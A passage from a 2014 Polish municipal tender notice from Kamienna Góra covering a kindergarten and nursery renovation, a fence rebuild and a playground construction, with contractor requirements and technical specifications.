Część II: Wykonawca winien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej 1 zadanie polegające na przebudowie ogrodzenia ze stalowych elementów prefabrykowanych, o wartości minimum 40 000,00 zł (słownie: czterdzieści tysięcy złotych).
Część III: Wykonawca winien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej 2 zadania polegające na budowie placu zabaw na powierzchni minimum 100 m2 (słownie: sto metrów kwadratowych)  każde zadanie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I, II i III: Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I, II i III: Wykonawca winien wykazać, że dysponuje 1 osobą pełniącą funkcję kierownika robót stosownie do przepisów ustawy Prawo Budowlane, posiadającą wykształcenie techniczne i uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno - budowlanej oraz będącą członkiem właściwej terytorialnie izby inżynierów budownictwa.
Część I: Wykonawca winien wykazać, że dysponuje 1 osobą pełniącą funkcję kierownika robót w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych oraz będącą członkiem właściwej terytorialnie izby inżynierów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I, II i III: Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dotyczy Części III zamówienia: W celu potwierdzenia, że oferowane urządzenia zabawowe odpowiadają wymaganiom określonym przez Zamawiającego Wykonawcy zobowiązani są złożyć karty katalogowe wszystkich urządzeń przewidzianych do zamontowania na placu zabaw.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza wprowadzenie do umowy zmian wymienionych wyłącznie w niniejszym punkcie w drodze aneksu do umowy, poprzedzonego pisemnym, umotywowanym wnioskiem z uwzględnieniem zasad ich wprowadzenia.
1.1.Zamawiający może zmienić termin realizacji przedmiotu umowy w przypadku:
a)	zawieszenia robót budowlanych przez Zamawiającego,
b)	zmian dokumentacji projektowej, dokonywanych na wniosek Zamawiającego lub zgłaszanych i zaakceptowanych przez Zamawiającego,
c)	wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających prowadzenie prac,
d)	Zlecenia Wykonawcy robót budowlanych dodatkowych w rozumieniu przepisu art. 67 Ustawy.
1.2.	Termin wykonania umowy może zostać wydłużony maksymalnie o czas opóźnienia spowodowanego okolicznościami określonymi w pkt 23.1.3.
1.3.	W przypadku wystąpienia koniecznych zmian w dokumentacji projektowej dopuszcza się zmiany w umowie.
2.	Pozostałe zmiany: 
2.1.	W każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego (np. powoduje skrócenie terminu realizacji umowy, zmniejszenie wartości umowy).
2.2.	Przypadki losowe (np. katastrofy lub inne czynniki zewnętrzne, zgony i niemożliwe do przewidzenia wydarzenia), które będą miały wpływ na treść zawartej umowy.
2.3.	Obniżenie wynagrodzenia Wykonawcy, spowodowane rezygnacją przez Zamawiającego z części przedmiotu umowy. W takim przypadku wynagrodzenie Wykonawcy zostanie pomniejszone, przy czy Zamawiający zapłaci za wszystkie spełnione świadczenia i udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.
3.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy:
3.1.	Zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana nr rachunku bankowego);
3.2.	Zmiana danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kamiennagora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kamienna Góra
Plac Grunwaldzki 1
58-400 Kamienna Góra
Wydział Zamówień Publicznych, Inwestycji i Funduszy Zewnętrznych, pok. 308.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2014 godzina 12:45, miejsce: Urząd Miasta Kamienna Góra
Plac Grunwaldzki 1
58-400 Kamienna Góra
Sekretariat, pok. 209.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont pomieszczeń w budynku Przedszkola Publicznego nr 1 i Żłobka Miejskiego przy ul. Spacerowej w Kamiennej Górze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest remont pomieszczeń w budynku Przedszkola Publicznego nr 1 i Żłobka Miejskiego przy ul. Spacerowej w Kamiennej Górze.

Terenem inwestycji jest kompleks budynków Przedszkola Publicznego nr 1 i Żłobka Miejskiego zlokalizowany przy ul. Spacerowej w Kamiennej Górze. Istniejące budynki posiadają dwie kondygnacje naziemne, budynek przedszkola jest podpiwniczony. Obiekty powstały w końcu lat sześćdziesiątych XX w. Wokół budynku urządzona jest kompletna infrastruktura techniczna tj. dojazd, dojścia, przyłącza kanalizacyjne, energetyczne, wodociągowe, telekomunikacyjne. Obiekty wraz z przyległym terenem zieleni (nawierzchnia trawiasta) pełnią funkcję budynków przedszkolnych i żłobkowych związanych z opieką nad dziećmi od lat 3.
Pomieszczenia w budynkach są przystosowane do swej funkcji i w części odnowione poprzez wymianę podłóg, tynków ścian, urządzeń sanitarnych i pozostałych instalacji. Pozostają w budynkach jednak pomieszczenia utrzymywane w stanie nie polepszonym od czasu budowy. Stan części instalacji elektrycznej nie odpowiada wymaganiom nowych norm a zabezpieczenia ppoż i warunki ewakuacji budzą zastrzeżenia instytucji kontrolujących w tym Państwowej Straży Pożarnej.

Dla poprawy stanu budynków oraz unowocześnienia bazy edukacyjnej budynków przedszkola i żłobka planuje się przeprowadzenie remontu obiektów. 
W szczególności zakres robót remontowo-budowlanych będzie obejmował:
1.dostosowanie budynku przedszkola do obowiązujących przepisów w zakresie zabezpieczenia przeciwpożarowego w tym:
-wykonanie instalacji oddymiania dróg ewakuacyjnych (klatek schodowych) z montażem central oddymiania i ich zasilania
-wykonanie stalowej konstrukcji wsporczej dla wykucia otworu w stropodachu i montażu klapy oddymiającej z siłownikami
-montaż klap oddymiających (dostawa i montaż 1szt. klapy i dostosowanie istniejących okien do celów oddymiania)
-uszczelnienie pokrycia dachowego po montażu klapy oddymiającej (obróbki blacharskie, uzupełnienia pokrycia z papy)
-montaż napędu drzwiowego z zasilaniem w drzwiach napowietrzających (istniejące)
-budowa instalacji oświetlenia awaryjnego

UWAGA: Po wykonaniu prac montażowych klapy oddymiającej i stalowej konstrukcji wsporczej oraz montażu przewodów zasilających instalacji oddymiającej należy uzupełnić wszystkie miejsca uszkodzonych tynków wewnętrznych wraz z malowaniem ścian i sufitów w odpowiednich kolorach oraz w sposób zapewniający estetyczny wygląd (w tym malowanie ścian i sufitu klatki schodowej o pow. ok. 40m2).

2.odnowienie części pomieszczeń w budynku Żłobka Miejskiego poprzez wykonanie następujących prac remontowych:
-wymianę zniszczonych podłóg poprzez ułożenie płytek ceramicznych, 
-odnowienie ścian poprzez zeskrobanie starej farby na ścianach i sufitach, przetarcie tynków i malowanie pomieszczeń,
-wykonanie okładzin ściennych z płytek ceramicznych
-wymianę drzwi wewnętrznych
-wymianę wewnętrznej instalacji elektrycznej w remontowanych pomieszczeniach,
-wymianę balustrad schodowych i odnowienie klatek schodowych.

Szczegółowy zakres robót remontowych w pomieszczeniach Żłobka Miejskiego:
Pomieszczenie nr 1 (klatka schodowa)
1.odnowienie ścian i sufitów z malowaniem i wykonanie lamperii do wys. 1,60m z akrylowych tynków dekoracyjnych (tynk mozaikowy)
2.wymiana 4szt. drzwi wewnętrznych
3.wykonanie okładzin biegów i spoczników schodowych z płytek ceramicznych z cokolikami, przygotowanie podłoża przez nakłucie istniejącej posadzki lastrykowej
4.wymiana balustrady schodowej i poręczy
5.wymiana istniejącej instalacji oświetleniowej z montażem nowych opraw świetlówkowych


Pomieszczenie nr 2 (wózkownia)
1.miejscowa naprawa pęknięcia ściany (przemurowanie miejsc zarysowania)
2.odnowienie ścian i sufitów z malowaniem i wykonanie lamperii do wys. 1,60m z akrylowych tynków dekoracyjnych (tynk mozaikowy)
3.wykonanie posadzki z płytek ceramicznych z cokolikami z przygotowaniem podłoża (nakłucie istniejącej posadzki lastrykowej)
4.wymiana istniejącej instalacji oświetleniowej z montażem nowych opraw świetlówkowych

Pomieszczenie nr 3 (klatka schodowa)
1.odnowienie ścian i sufitów z malowaniem i wykonanie lamperii do wys. 1,60m z akrylowych tynków dekoracyjnych (tynk mozaikowy)
2.wymiana 1szt. drzwi wewnętrznych
3.wykonanie okładzin biegów i spoczników schodowych z płytek ceramicznych z cokolikami, przygotowanie podłoża przez nakłucie istniejącej posadzki lastrykowej
4.wymiana balustrady schodowej i poręczy z wykonaniem zastawy schodowej
5.wymiana istniejącej instalacji oświetleniowej z montażem nowych opraw świetlówkowych

Pomieszczenie nr 4 (klatka schodowa)
1.odnowienie ścian i sufitów z malowaniem i wykonanie lamperii do wys. 1,60m z akrylowych tynków dekoracyjnych (tynk mozaikowy)
2.wymiana 1szt. drzwi wewnętrznych z poszerzeniem otworu i montażem nadproży prefabrykowanych
3.wykonanie okładzin biegów i spoczników schodowych z płytek ceramicznych z cokolikami, przygotowanie podłoża przez nakłucie istniejącej posadzki lastrykowej
4.wymiana balustrady schodowej i poręczy z wykonaniem zastawy schodowej
5.wymiana istniejącej instalacji oświetleniowej z montażem nowych opraw świetlówkowych

Pomieszczenie nr 5 (pomieszczenie socjalno-sanitarne dla personelu)
1.odnowienie ścian i sufitów z malowaniem i wykonanie lamperii do wys. 1,60m z akrylowych tynków dekoracyjnych (tynk mozaikowy) w pom. szatni i okładzin z płytek ceramicznych do wys. 2,0 m w pom. przedsionka, WC i natrysku
2.wykonanie posadzki z płytek ceramicznych z cokolikami z przygotowaniem podłoża (rozebranie starej posadzki z PCV i wyrównanie podłoża) 
3.wymiana 3 szt. drzwi wewnętrznych w tym 2szt. z poszerzeniem otworu i montażem nadproży prefabrykowanych (drzwi z otworami wentylacyjnymi)
4.wymiana urządzeń sanitarnych wraz z podłączeniami (muszla, umywalka, brodzik z kotarą) 
5.wymiana baterii umywalkowej i natryskowej
6.wymiana istniejącej instalacji oświetleniowej i gniazdek z montażem nowych opraw świetlówkowych i żarowych

Pomieszczenie nr 6 (korytarz)
1.odnowienie ścian i sufitów z malowaniem i wykonanie lamperii do wys. 1,60m z akrylowych tynków dekoracyjnych (tynk mozaikowy) 
2.wykonanie posadzki z płytek ceramicznych z cokolikami z przygotowaniem podłoża przez nakłucie istniejącej posadzki lastrykowej
3.wymiana 5 szt. drzwi wewnętrznych w tym 1szt. z poszerzeniem otworu i montażem nadproży prefabrykowanych 1 szt. z okienkiem podawczym
4.wymiana istniejącej instalacji oświetleniowej z montażem nowych opraw świetlówkowych

Wszystkie prace należy wykonać zgodnie z dokumentacją projektową oraz specyfikacjami technicznymi wykonania i odbioru robót.
Poza pracami określonymi powyżej do Wykonawcy należeć będą wszystkie inne obowiązki określone w Części III. Istotne postanowienia umowy.
Wykonawca ma obowiązek zapoznania się w sposób bardzo szczegółowy z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, warunkami umowy oraz przedmiarami robót. Wykonawca ma obowiązek wyjaśnić z Zamawiającym wszystkie wątpliwości w stosunku do zakresu zawartego w przywołanych dokumentach, przed złożeniem ofert. Po złożeniu oferty, Zamawiający będzie uważał, że Wykonawca nie ma wątpliwości i uwag w stosunku do zakresu ujętego w specyfikacji. 
Zamawiający informuje, że w okresie od 1 sierpnia do 31 sierpnia Przedszkole Publiczne i Żłobek Miejski będą nieczynne i w tym czasie roboty mogą być prowadzone bez przeszkód. Prowadzenie prac poza tym okresem należy wykonywać w uzgodnieniu z Dyrekcją przedszkola i żłobka.
Zamawiający wymaga, aby Wykonawca udzielił gwarancji wynoszącej minimum 36 miesięcy na wykonane i odebrane roboty.
Integralną część opisu przedmiotu zamówienia stanowi:
1.	dokumentacja projektowa,
2.	specyfikacja techniczna wykonania i odbioru robót,
3.	przedmiar robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa ogrodzenia terenu Przedszkola Publicznego nr 1 i Żłobka Miejskiego przy ul. Spacerowej w Kamiennej Górze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest przebudowa ogrodzenia terenu Przedszkola Publicznego nr 1 i Żłobka Miejskiego przy ul. Spacerowej w Kamiennej Górze.

Projektuje się przebudowę istniejącego ogrodzenia w części po istniejącej trasie - wzdłuż ul. Browarowej i Krótkiej a w części przesunięte do granicy działki wg ewidencji gruntów - wzdłuż ul. Spacerowej. Wysokość projektowanego ogrodzenia ok. 170 cm.
Dodatkowo zakłada się budowę części nowego ogrodzenia w okolicy budynku trafostacji i nasadzenie wokół tego ogrodzenia krzewów żywopłotu. Krzewy do nasadzeń należy pozyskać z istniejącego żywopłotu przy rozbieranym ogrodzeniu (lokalizację wskaże Zamawiający).  
Zakres robót przy przebudowie ogrodzenia obejmuje:
1.rozbiórkę istniejącego ogrodzenia z siatki w ramkach z kątowników, z siatki rozciągniętej na stalowych słupkach i z paneli ogrodzeniowych na słupkach
2.rozbiórkę całkowitą lub miejscową betonowego cokołu ogrodzenia wraz z wywozem i utylizacją materiału rozbiórkowego w tym:
-całkowitą rozbiórkę cokołu o szer. 20cm wzdłuż ul. Spacerowej z uporządkowaniem terenu (dł. ok. 122m)
-miejscową rozbiórkę cokołu o szer. 20 cm wzdłuż ul. Krótkiej w miejscach montażu nowych słupków stalowych i zabetonowanie miejsc po wycięciu starych słupków (długość ok. 35m)
-miejscową rozbiórkę cokołu o szer. 30 cm wzdłuż ul. Browarowej w miejscach montażu nowych słupków stalowych i zabetonowanie miejsc po wycięciu starych słupków (długość ok. 160m)
3.wytyczenie trasy nowego ogrodzenia z rozmieszczeniem bramy i furtek
4.montaż ogrodzenia panelowego wraz z montażem bramy i 3 furtek w tym:
-zabetonowanie nowych słupków w wykutych gniazdach istniejącego cokołu betonowego wzdłuż ul. Browarowej i Krótkiej (dł. ok. 195m)
-montaż ogrodzenia bez cokołu (słupki zabetonowane w gruncie) wzdłuż ul. Spacerowej i od pl. Browarowego (dł. ok. 151m)
5.przesadzenie krzewów żywopłotu
6.prace porządkowe polegające na wyrównaniu terenu wzdłuż ogrodzenia

Elementy rozebranego ogrodzenia, które będą w dobrym stanie technicznym należy przewieźć we wskazane przez Zamawiającego miejsce na terenie miasta Kamiennej Góry (odległość do 2 km) 
Projektuje się nowe ogrodzenie systemowe w postaci gotowych, prefabrykowanych paneli ogrodzeniowych zamontowanych na słupkach stalowych zabetonowanych w gruncie.
Panele ogrodzeniowe powinny być wykonane w postaci układu zgrzewanych prętów stalowych o śr. min 5mm, ocynkowanych ogniowo z powłoką z PCV, ze wzmocnieniami w postaci 4 przetłoczeń poziomych. 
Słupki do ogrodzeń panelowych mają być wykonane ze stalowych profili zamkniętych (kwadratowe lub prostokątne), stalowe, ocynkowane ogniowo i powlekane PCV. Wysokość słupków dostosowana do wysokości paneli ogrodzeniowych. Słupki zabetonowane w gruncie.
W ciągu ogrodzenia zakłada się zamontowanie 3 szt. furtek otwieranych o szer. 1,0m i wysokości min. 1,50m, zamontowanych na słupkach ogrodzeniowych. Furtki należy wykonać z materiałów takich jak reszta elementów ogrodzenia a konstrukcja furtek ma być dostosowana do systemu ogrodzeń panelowych.  
Na wjeździe na posesję przedszkola należy zamontować bramę wjazdową dwuskrzydłową o szerokości 3,50 m i wysokości min. 1,50m (wysokość ma być taka sama jak wysokość furtki). Bramę należy zamontować na słupkach ogrodzeniowych i wykonać z materiałów takich jak reszta elementów ogrodzenia o konstrukcji dostosowanej do systemu ogrodzeń panelowych


Przykładowe ogrodzenie panelowe
Panel ogrodzeniowy wysokość 176cm serii SOLID powlekany PCV w technologii DUAL-TECH (ocynk ogniowy+ powłoka w kolorze z palety RAL). Panel ogrodzeniowy SOLID posiada następujące parametry:
-szerokości 2505mm
-wysokości 1760mm
-4 wzmocniena w postaci przetłoczeń poziomych
-średnica drutów poziomych o5mm
-średnica drutów pionowych o5mm
-odstęp pomiędzy drutami pionowymi wynosi 5cm

Słupek profilowy do ogrodzeń panelowych o przekroju prostokątnym. Słupki produkowane są na bazie profili zamkniętych o zwiększonej wytrzymałości na obciążenia. Słupek stalowy, ocynkowany ogniowo i powlekany PCV.


Furtka standardowa przeznaczona do użytku przydomowego i przemysłowego, wysokość 1,5metra, szerokość 1metr . Wykonana z najwyższej jakości materiałów i komponentów. Projekt furtki jest bardzo uniwersalny, wizualnie i funkcjonalnie furtka pasuje do ogrodzeń panelowych, siatki ogrodzeniowej, a nawet ogrodzeń betonowych. W skład kompletnego zestawu wchodzą:
-skrzydło furtki
-2 słupki 
-komplet zawiasów
-zamek z klamką

Brama standardowa dwuskrzydłowa o szerokości 3,5 metra i wysokości 1,5m ocynkowana i powlekana PCV. Wykonana z elementów stalowych. Szerokość 3,5 metra jest najbardziej popularną szerokością dla tego typu bram. Zaprojektowana do uniwersalnego użytku w ogrodzeniach działek, domów jednorodzinnych i placów przemysłowych. 
Bramy dwuskrzydłowa nadają się do zamknięcia wjazdów do domów jednorodzinnych, obiektów przemysłowych, hal, magazynów oraz placów i parkingów. Projekt oferowanej bramy jest bardzo uniwersalny, wizualnie i funkcjonalnie pasuje do ogrodzeń panelowych, siatki ogrodzeniowej, a nawet ogrodzeń betonowych. 
W skład kompletnego zestawu (kompletnej bramy) wchodzą:
-skrzydła 2 sztuki , każde 1,75m szerokości
-2 słupki 
-komplet zawiasów
-zamek 
Wszystkie prace należy wykonać zgodnie z dokumentacją projektową oraz specyfikacjami technicznymi wykonania i odbioru robót.
Poza pracami określonymi powyżej do Wykonawcy należeć będą wszystkie inne obowiązki określone w Części III. Istotne postanowienia umowy.
Wykonawca ma obowiązek zapoznania się w sposób bardzo szczegółowy z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, przedmiarem robót oraz warunkami umowy. Wykonawca ma obowiązek wyjaśnić z Zamawiającym wszystkie wątpliwości w stosunku do zakresu zawartego w przywołanych dokumentach, przed złożeniem ofert. Po złożeniu oferty, Zamawiający będzie uważał, że Wykonawca nie ma wątpliwości i uwag w stosunku do zakresu ujętego w specyfikacji. 
Zamawiający informuje, że w okresie od 1 sierpnia do 31 sierpnia Przedszkole Publiczne i Żłobek Miejski będą nieczynne i w tym czasie roboty mogą być prowadzone bez przeszkód. Prowadzenie prac poza tym okresem należy wykonywać w uzgodnieniu z Dyrekcją przedszkola i żłobka.
Zamawiający wymaga, aby Wykonawca udzielił gwarancji wynoszącej minimum 36 miesięcy na wykonane i odebrane roboty.
Integralną część opisu przedmiotu zamówienia stanowi:
1.	dokumentacja projektowa,
2.	specyfikacja techniczna wykonania i odbioru robót,
3.	przedmiar robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.34.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Budowa placu zabaw na terenie Przedszkola Publicznego nr 1 przy ul. Spacerowej w Kamiennej Górze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest montaż nowych urządzeń zabawowych placu zabaw na terenie wokół budynku Przedszkola Publicznego nr 1 przy ul. Spacerowej w Kamiennej Górze oraz wykonanie prac przygotowania terenu, polegających na demontażu starych urządzeń (piaskownica w obudowie drewnianej, drabinki z rur stalowych - 2 szt.) i miejscowej niwelacji terenu po rozebranych urządzeniach i wysianiu w tym miejscu trawy. Zakłada się montaż urządzeń wykonanych z drewna (bale, krawędziaki, okrąglaki itp.), materiałów drewnopodobnych (sklejki wodoodporne laminowane, płyty HPL itp.) z uzupełnieniami stalowymi odpowiednio zabezpieczonymi.

Wymagane urządzenia placu zabaw 
Przykładowe rozmieszczenia urządzeń pokazano na załączniku graficznym - powierzchnia terenu do wykorzystania ok. 800m2.
Poniżej przedstawiono wykaz wymaganych urządzeń wraz z opisem oraz przybliżone wymiary urządzeń w rzucie (wymiary dotyczą ich obrysu bez stref bezpieczeństwa):
1.Zestaw zabawowy duży z zadaszeniami, wieżami, drabinką, pomostami, zjeżdżalniami, przeplotnią, elementami do wspinania i przechodzenia, wejściami itp. o wym. ok. 12,0x12,0m -1szt.
2.Zestaw sprawnościowy z drabinkami, elementami do wspinania, podciągania, przechodzenia itp. o wym. ok. 4,0x4,0m. - 1szt.
3.Średni zestaw zabawowy typu samochód z przyczepą, pociąg o wym. ok. 6,0x1,0m - 1szt.
4.Średni zestaw zabawowy z pomostami, wieżami, pochylniami itp. o wym. ok. 10,0x3,0m - 1szt.
5.Huśtawka wagowa typu ważka - 1szt.
6.Huśtawka wahadłowa podwójna - 2szt.
7.Altana biesiadna zadaszona z miejscami do siedzenia o wym. ok. 2,0x3,0m
8.Piaskownica podwójna o wym. ok. 6,0x3,0m wypełniona piaskiem wraz z przykryciem (plandeka) zabezpieczającym przez dostępem zwierząt 
9.Ławka bez oparcia o wym. ok. 1,5x0,5m - 8szt.

Wymagania dotyczące urządzeń zabawowych:
1.	Belki nośne mocujące elementy placu zabaw w podłożu winny być wykonywane z drewna spełniającego wymagania normy EN 350 -2 w formie belek bezrdzeniowych, okrągłe o średnicy O 100 - 120 mm lub o przekroju kwadratowym i prostokątnym, zabezpieczonych impregnatami olejowymi lub innymi ciśnieniowo, 
2.	Belki drewniane mają być mocowane 8-10 cm ponad ziemią na stalowych kotwach. Kotwy mocujące należy utwierdzić w fundamencie o głębokości 70 cm z betonu B20
3.	Pozostałe elementy drewniane w tym podesty należy wykonać z drewna akacjowego lub z drewna innych gatunków w formie belek bezrdzeniowych, o przekroju okrągłym, kwadratowym lub zabezpieczonych impregnatami olejowymi. 
4.	Szczeble barierek, daszki, można wykonać ze sklejki wodoodpornej pomalowanej farbami odpornymi na warunki atmosferyczne. 
5.	Dopuszcza się wykonanie innych pomocniczych elementów urządzeń zabawowych ze sklejki wodoodpornej laminowanej, płyt HPL itp.
6.	Wszystkie elementy stalowe (wraz z podstawami w gruncie) powinny być cynkowane ogniowo, a dopiero po ocynkowaniu malowane proszkowo. 
7.	Ślizgi zjeżdżalni należy wykonać z blachy ze stali nierdzewnej lub odpowiednich tworzyw sztucznych. 
8.	Wszystkie stosowane śruby winny być ocynkowane . 
9.	Materiały, substancje, śruby, łańcuchy, sprężyny i inne połączenia oraz elementy zabezpieczające wykorzystane przy produkcji i montażu maja posiadać wymagane atesty i dopuszczenia. 
10.	Wszystkie elementy drewniane maja być wyszlifowane 
11.	Należy pamiętać, aby przy urządzeniach wykonanych z okrąglaków, były zastosowane dystanse zapobiegające zakleszczeniu odzieży (guzików)

Wszystkie urządzenia muszą posiadać certyfikaty zgodności z obowiązującymi normami potwierdzone przez jednostki akredytowane przy Polskim Centrum Akredytacji. Wyroby posiadać mają tabliczki znamionowe określające wykonawcę, spełnianie norm bezpieczeństwa (PN-EN 1176-1-6) oraz dane telefoniczne i adresowe.

Wszystkie prace należy wykonać zgodnie z dokumentacją projektową oraz specyfikacjami technicznymi wykonania i odbioru robót.
Poza pracami określonymi powyżej do Wykonawcy należeć będą wszystkie inne obowiązki określone w Części III. Istotne postanowienia umowy.
